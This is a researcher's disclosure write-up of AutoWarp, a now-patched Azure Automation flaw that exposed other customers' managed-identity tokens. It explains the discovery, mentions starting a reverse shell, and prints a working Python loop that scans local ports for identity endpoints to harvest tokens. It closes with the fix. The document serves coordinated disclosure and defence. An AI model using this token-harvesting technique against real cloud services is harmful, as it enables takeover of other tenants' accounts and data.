AutoWarp is a critical vulnerability in the Azure Automation service that allowed unauthorized access to other Azure customer accounts using the service. Depending on the permissions the customer had assigned, an attacker could have gained full control over the targeted account’s resources and data.

Our research showed that multiple large companies were using the service and could have been accessed, putting billions of dollars at risk. We reported this issue directly to Microsoft; it is now fixed, and all impacted customers have been notified.

Were You Vulnerable to AutoWarp?

You were vulnerable to AutoWarp before it was fixed if:

- You were using the Azure Automation service

- The Managed Identity feature in your automation account was enabled (it is enabled by default)

AutoWarp Discovery Timeline

- December 6, 2021: We began our research, discovered the vulnerability, and reported it to Microsoft.

- December 7, 2021: We discovered large companies at risk (including a global telecommunications company, two car manufacturers, a banking conglomerate, Big Four accounting firms, and more).

- December 10, 2021: Microsoft fixed the issue and started looking for additional variants of this attack.

- March 7, 2022: Public disclosure following Microsoft’s investigation conclusion.

Microsoft’s Statement

“We want to thank Yanir Tsarimi from Orca Security who reported this vulnerability and worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.”

-Microsoft Security Response Center (MSRC)

Microsoft published its own response to this incident on its blog.

Microsoft also recommends that Automation customers follow its published security best practices.

What Is the Microsoft Azure Automation Service?

Microsoft Azure Automation allows customers to execute automation code in a managed fashion. You can schedule jobs, provide input and output, and more. Each customer’s automation code runs inside a sandbox, isolated from other customers’ code executing on the same virtual machine.

AutoWarp: The Azure Automation Security Flaw

We found a serious flaw that allowed us to interact with an internal server that manages the sandboxes of other customers. We managed to obtain authentication tokens for other customer accounts through that server. Someone with malicious intentions could’ve continuously grabbed tokens, and with each token, widen the attack to more Azure customers.

Full Technical Details – Researcher Point of View

I was scrolling through the Azure services list, looking for my next service to research. Seeing “Automation Accounts” under the “Management & Governance” category caught me off guard. I thought it was some kind of service allowing me to control Azure accounts with automation.

After creating my first automation account, I realized that Azure Automation is a pretty standard service for (unsurprisingly) automation scripts. You can upload your Python or PowerShell script to execute on Azure.

What I love most about research is exploring the unknown, so the first thing I did was explore the file system to see what juicy stuff I might find. I started a reverse shell from my automation script, making the work against the server much smoother.

Setting up a reverse shell with Python was no problem. However, when I ran some common commands like tasklist, I got an error saying they were not found. It turned out that the PathExt environment variable, which defines which file extensions the OS should try when executing a command, was set to a strange value. It usually contains the .exe extension, but not in our case: only .CPL was there, which is the file extension for Windows Control Panel items. Even when I used tasklist.exe explicitly to list the running processes, it gave me a message I had never seen before. Something was clearly up…
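To see why the modified PathExt breaks bare commands, here is a simplified model of how a Windows shell resolves a name like `tasklist`. It tries each extension listed in PathExt in every PATH directory, in order. This is a sketch under assumptions, not the exact cmd.exe algorithm: real resolution also checks the current directory first and handles names that already carry an extension. The helper `resolve_bare_command` and the `installed` file set are hypothetical.

```python
import ntpath
from typing import Callable, Iterable, Optional


def resolve_bare_command(
    name: str,
    path_dirs: Iterable[str],
    pathext: str,
    exists: Callable[[str], bool],
) -> Optional[str]:
    """Simplified model: append each PATHEXT extension to a bare name."""
    extensions = [ext for ext in pathext.split(";") if ext]
    for directory in path_dirs:
        for ext in extensions:
            # ntpath builds Windows-style paths on any host OS.
            candidate = ntpath.join(directory, name + ext)
            if exists(candidate):
                return candidate
    return None


SYSTEM32 = r"C:\Windows\System32"
# Hypothetical file system: only tasklist.exe exists (case-insensitive, as on Windows).
installed = {r"c:\windows\system32\tasklist.exe"}


def exists(path: str) -> bool:
    return path.lower() in installed


# A typical PATHEXT finds the executable...
print(resolve_bare_command("tasklist", [SYSTEM32], ".COM;.EXE;.BAT;.CMD", exists))
# ...but with only .CPL listed, the same command is "not found".
print(resolve_bare_command("tasklist", [SYSTEM32], ".CPL", exists))
```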

The first two things that caught my attention on the C:\ drive were the “Orchestrator” and “temp” directories. The orchestrator directory contained a lot of DLLs and EXEs. I saw filenames containing “sandbox”, and I intuitively understood that this directory contained the sandbox we were running in. The temp directory contained another directory named “diags”, which held a “trace.log” file.

Log files are great for research. In many cases, logs provide very concise and important information. You essentially get a chance to peek inside a diary describing what the developers deemed important. Luckily for me, this was a very good log file. This popped up very early, on line 7:

Orchestrator.Sandbox.Diagnostics Critical: 0 : [2021-12-06T12:08:04.5527647Z] Creating asset retrieval web service. [assetRetrievalEndpoint= http://127.0.0.1:40008]

“There’s nothing more exciting than finding out your target exposes a web service. Especially when it’s local AND on a high, seemingly random port.”

Yanir Tsarimi

Cloud Security Researcher, Orca Security

This just screamed red flags to me. It is what I usually call a “cover”: a software decision made to cover up for some technical limitation. Why would you choose such a high, random port? Because the other ports are taken.

I made an HTTP request to the URL with cURL. It worked but didn’t provide much information on what was going on. I also tried to access the next ports (40009, 40010, and so on). Some of them responded to me, which immediately confirmed my suspicions. The logs made it obvious that the web service was managed by the orchestrator I saw earlier, so I had to understand what was going on. What is this web service?
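Checking which neighboring ports “respond” boils down to a TCP connect test. Below is a minimal sketch of that idea in Python, assuming a plain connect is enough to tell a listening port from a closed one. The author used cURL for this step, so the helper name `listening_ports` and the timeout are illustrative choices.

```python
import socket
from typing import Iterable, List


def listening_ports(host: str, ports: Iterable[int], timeout: float = 0.2) -> List[int]:
    """Return the ports on `host` that accept a TCP connection."""
    found = []
    for port in ports:
        try:
            # create_connection raises OSError (including timeouts) if nothing listens.
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            continue
    return found
```

For example, `listening_ports("127.0.0.1", range(40008, 40020))` would list which of the ports after 40008 accept connections. It only reveals that something is listening, not what the service is.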

Peeking Inside the Azure Automation Code





After downloading the orchestrator’s files, I opened ILSpy (a .NET decompiler) and started looking for the code behind this “asset retrieval web service”, as they call it. In the method that sets up the HTTP routes, what really popped out was that “/oauth2/token” and “/metadata/identity/oauth2/token” were both mapped to a controller called “MSIController”. What I didn’t know at the time is that MSI stands for “Managed Service Identity”. Pretty interesting, right?

Although I hadn’t done much .NET web development or research before, I could infer from the code that these routes were handled by the “MSIController” class. This is pretty straightforward if you are familiar with the MVC (Model-View-Controller) pattern. Some experience in software development helps significantly when reviewing source code: it lets you “read between the lines”, even in more complicated cases.
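The key observation is that two different URL paths lead to the same controller, so either path reaches the token-issuing logic. A minimal routing-table sketch of that idea follows. It is written in Python for consistency with the rest of this post; the orchestrator itself is .NET, and `msi_controller`, `ROUTES`, and `dispatch` are hypothetical names, not its actual code.

```python
from typing import Callable, Dict


def msi_controller(path: str) -> str:
    # Hypothetical stand-in for the decompiled MSIController class.
    return f"MSIController handled {path}"


# Hypothetical route table: two distinct paths share one controller.
ROUTES: Dict[str, Callable[[str], str]] = {
    "/oauth2/token": msi_controller,
    "/metadata/identity/oauth2/token": msi_controller,
}


def dispatch(path: str) -> str:
    """Look up the controller for a path, as an MVC router would."""
    handler = ROUTES.get(path)
    if handler is None:
        return "404 Not Found"
    return handler(path)


print(dispatch("/oauth2/token"))
print(dispatch("/metadata/identity/oauth2/token"))
print(dispatch("/unknown"))
```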

I started making HTTP requests to /oauth2/token, adjusting them to look like metadata requests (adding the “Metadata: True” HTTP header) and adding the resource parameter. I wanted the token to be usable by Azure management APIs, so I used “resource=https://management.azure.com/”. The request simply returned a JWT (JSON Web Token). Uh-oh.
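The request described above can be sketched with Python’s standard library. It is a POST to the local token route with the `Metadata: True` header and a form-encoded `resource` parameter, mirroring the fields used in the scanning script later in this post. Port 40008 comes from the log line. The helper name `build_token_request` is hypothetical, and the function only builds the request; it does not send it.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_token_request(port: int, resource: str = "https://management.azure.com/") -> Request:
    """Build (but do not send) a POST to the local /oauth2/token route."""
    body = urlencode({"resource": resource}).encode()
    return Request(
        f"http://127.0.0.1:{port}/oauth2/token",
        data=body,
        headers={"Metadata": "True"},  # make it look like a metadata request
        method="POST",
    )


req = build_token_request(40008)
print(req.get_method(), req.full_url)
print(req.data)
```

Sending it would be a matter of `urllib.request.urlopen(req, timeout=...)`; inside the sandbox, the response body was the JWT.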

Now, who was the identity behind this token? I decoded the token and saw my subscription ID, tenant ID, and my automation account resource ID. I looked up “Azure Automation Identity” online and found that each automation account has a “system-assigned managed identity”, which basically means you can assign roles to your automation scripts and the identity is managed by the service. Cool.
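Decoding a JWT to see who it belongs to requires no keys, because the payload is just base64url-encoded JSON. Here is a minimal sketch that inspects the claims without verifying the signature, which is fine for inspection and never acceptable for authorization. The demo token is made up. The claim names are assumptions based on Azure AD conventions: `tid` for the tenant ID and `xms_mirid` for the managed identity’s resource ID.

```python
import base64
import json
from typing import Any, Dict


def decode_jwt_claims(token: str) -> Dict[str, Any]:
    """Decode a JWT payload WITHOUT verifying its signature (inspection only)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a three-part JWT")
    payload = parts[1]
    # JWTs use unpadded base64url; restore the padding before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def _b64url(obj: Dict[str, Any]) -> str:
    # Helper to build a fake token for the demo below.
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()


# Made-up token with placeholder values (assumed claim names, empty signature).
demo = ".".join([
    _b64url({"alg": "none"}),
    _b64url({
        "tid": "00000000-0000-0000-0000-000000000000",
        "xms_mirid": "/subscriptions/sub-id/resourceGroups/rg/providers/"
                     "Microsoft.Automation/automationAccounts/demo",
    }),
    "",
])
print(decode_jwt_claims(demo)["tid"])
```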

Next, I wanted to check whether my token was the real deal. I used the Azure CLI to make a simple request listing all my VMs (“az vm list”), intercepted the request, and swapped in the token. I got an error saying I didn’t have enough permissions. Duh, I hadn’t assigned any role to my managed identity. After I assigned a suitable role, the token worked. The token was actually linked to my managed identity!
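Intercepting the CLI is one option. A token can also be tested by calling the Azure Resource Manager REST API directly with it as a bearer token. Below is a sketch of the “list all VMs in a subscription” call. This is an alternative to the author’s approach, not what he did. The `api-version` value is an assumption, so check the current Compute REST reference. Without a role assignment, the call should be rejected with a permissions error.

```python
from urllib.request import Request

# Assumption: an api-version accepted by Microsoft.Compute; verify against current docs.
API_VERSION = "2021-07-01"


def build_list_vms_request(subscription_id: str, token: str) -> Request:
    """Build (but do not send) an ARM 'list all VMs' call authorized by `token`."""
    url = (
        "https://management.azure.com/subscriptions/"
        f"{subscription_id}/providers/Microsoft.Compute/virtualMachines"
        f"?api-version={API_VERSION}"
    )
    return Request(url, headers={"Authorization": f"Bearer {token}"})


req = build_list_vms_request("00000000-0000-0000-0000-000000000000", "<token>")
print(req.get_method(), req.full_url)
```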

Where Things Got Bad

A token linked to a managed identity is not an issue in itself: you are supposed to be able to get a token for your own managed identity. But if you’ve been following along, you’ll remember there were additional ports accessible locally. Each time I ran an automation job, the port changed, but it stayed within roughly the same range.



I wrote up a quick Python script that makes HTTP requests to a range of local ports starting at 40000. It was simple to do:

```python
import requests

PORT_RANGE_START = 40000
PORTS_TO_SCAN = 1000

print(f"Making requests to ports {PORT_RANGE_START} and up...")

for port in range(PORT_RANGE_START, PORT_RANGE_START + PORTS_TO_SCAN):
    try:
        # Ask each local port for a token, posing as a metadata request.
        resp = requests.post(
            f"http://127.0.0.1:{port}/oauth2/token",
            timeout=0.5,
            headers={"Metadata": "True"},
            data={"resource": "https://management.azure.com/"},
        )
        print(f"Port {port}: {resp.json()}")
    except Exception:
        # Closed ports, timeouts, and non-JSON responses are all skipped.
        continue
```

Random ports gave me JWTs. I ran the script a few more times, and different ports gave me different tokens! It was obvious to me that I was actually accessing other people’s identity endpoints. I had already proven that these tokens could be used to manage an Azure account when given enough permissions, so actually accessing other tenants’ data was not necessary.

We wanted to understand how far this simple flaw could go. We used the schedules feature of Azure Automation to grab tokens from a few hundred ports and see which tenants came up. We did not store the tokens; we only extracted metadata about each tenant (tenant ID and automation account resource ID).
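Keeping only tenant metadata can be as simple as reducing each token’s decoded claims to a tenant-to-accounts map and discarding everything else. Here is a minimal sketch, assuming the claims have already been decoded into dictionaries. It also assumes the `tid` and `xms_mirid` claim names used by Azure AD managed identity tokens. The helper name `summarize_tenants` is hypothetical.

```python
from typing import Dict, Iterable, Mapping, Set


def summarize_tenants(claim_sets: Iterable[Mapping[str, str]]) -> Dict[str, Set[str]]:
    """Map tenant ID -> automation account resource IDs; nothing else is kept."""
    tenants: Dict[str, Set[str]] = {}
    for claims in claim_sets:
        tenant_id = claims.get("tid")  # assumed tenant ID claim
        if not tenant_id:
            continue
        accounts = tenants.setdefault(tenant_id, set())
        resource_id = claims.get("xms_mirid")  # assumed resource ID claim
        if resource_id:
            accounts.add(resource_id)
    return tenants


print(summarize_tenants([
    {"tid": "tenant-a", "xms_mirid": "/subscriptions/s1/.../automationAccounts/a1"},
    {"tid": "tenant-a", "xms_mirid": "/subscriptions/s1/.../automationAccounts/a1"},
    {"tid": "tenant-b"},
]))
```

Using a set per tenant means repeated hits on the same account across hourly runs are counted once.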

In this short period of time, before the issue was patched, we saw many unique tenants, including several very well-known companies! And this was just from a scheduled run every hour. Had we run continuously, we likely would have captured many more. The identity endpoint presumably goes down as soon as its automation job finishes, so in some cases you would have to grab the token really fast.

This was a fairly simple flaw that turned into a very interesting and fun vulnerability. It’s unclear exactly what was missing here. The identity endpoint could have required some form of authentication (other endpoints on this server certainly did). Or perhaps someone overlooked the fact that the network inside the machine is not actually sandboxed, as you might expect it to be.

The Aftermath of the AutoWarp Microsoft Azure Automation Vulnerability

I reported the flaw to Microsoft the same day. I would like to thank them for being so responsive and cooperative throughout the responsible disclosure process. Microsoft patched this issue by requiring the “X-IDENTITY-HEADER” HTTP header when requesting identities; its value must match a secret provided to the job through its environment variables. They also mentioned they are performing an overall review of their architecture to make sure things like this don’t happen again!
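The fix amounts to a shared-secret check: only code that can read the job’s environment knows the value that the identity endpoint expects in `X-IDENTITY-HEADER`. The sketch below shows both sides of that idea. It is not Microsoft’s implementation. The environment variable names `IDENTITY_ENDPOINT` and `IDENTITY_HEADER` are assumptions based on how Azure documents managed identities for Automation and App Service. The helper names are hypothetical.

```python
import hmac
import os
from typing import Mapping, Optional
from urllib.parse import urlencode
from urllib.request import Request

HEADER_NAME = "X-IDENTITY-HEADER"


def is_authorized(headers: Mapping[str, str], expected_secret: str) -> bool:
    """Server side: accept only requests that present the per-job secret."""
    # HTTP header names are case-insensitive.
    presented: Optional[str] = next(
        (value for name, value in headers.items() if name.lower() == HEADER_NAME.lower()),
        None,
    )
    if presented is None:
        return False
    # Constant-time comparison avoids leaking the secret through timing.
    return hmac.compare_digest(presented.encode(), expected_secret.encode())


def build_authenticated_request(endpoint: str, secret: str,
                                resource: str = "https://management.azure.com/") -> Request:
    """Client side: attach the secret read from the job's environment."""
    return Request(
        endpoint,
        data=urlencode({"resource": resource}).encode(),
        headers={HEADER_NAME: secret, "Metadata": "True"},
        method="POST",
    )


# Assumed environment variable names; only build the request if both are present.
endpoint = os.environ.get("IDENTITY_ENDPOINT")
secret = os.environ.get("IDENTITY_HEADER")
if endpoint and secret:
    print(build_authenticated_request(endpoint, secret).full_url)
```

A neighbor sandbox scanning local ports, as in the script above, would not know the secret, so `is_authorized` rejects its requests.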

We are happy that we found this issue before it landed in the wrong hands. We would like to thank Microsoft for working with us and fixing this issue swiftly and professionally. Our research into cloud providers will continue, and you can expect to hear more from us soon.

AutoWarp, and previous critical cloud vulnerabilities such as AWS Superglue and BreakingFormation show that nothing is bulletproof and there are numerous ways attackers can reach your cloud environment. That’s why it’s important to have complete visibility into your cloud estate including the most critical attack paths. To help, I invite you to experience our tech and talent first-hand with a no-obligation, free cloud risk assessment. You’ll get complete visibility into your public cloud, a detailed risk report with an executive summary, and time with our cloud security experts.


Yanir Tsarimi is a Cloud Security Researcher at Orca Security. Follow him on Twitter @Yanir_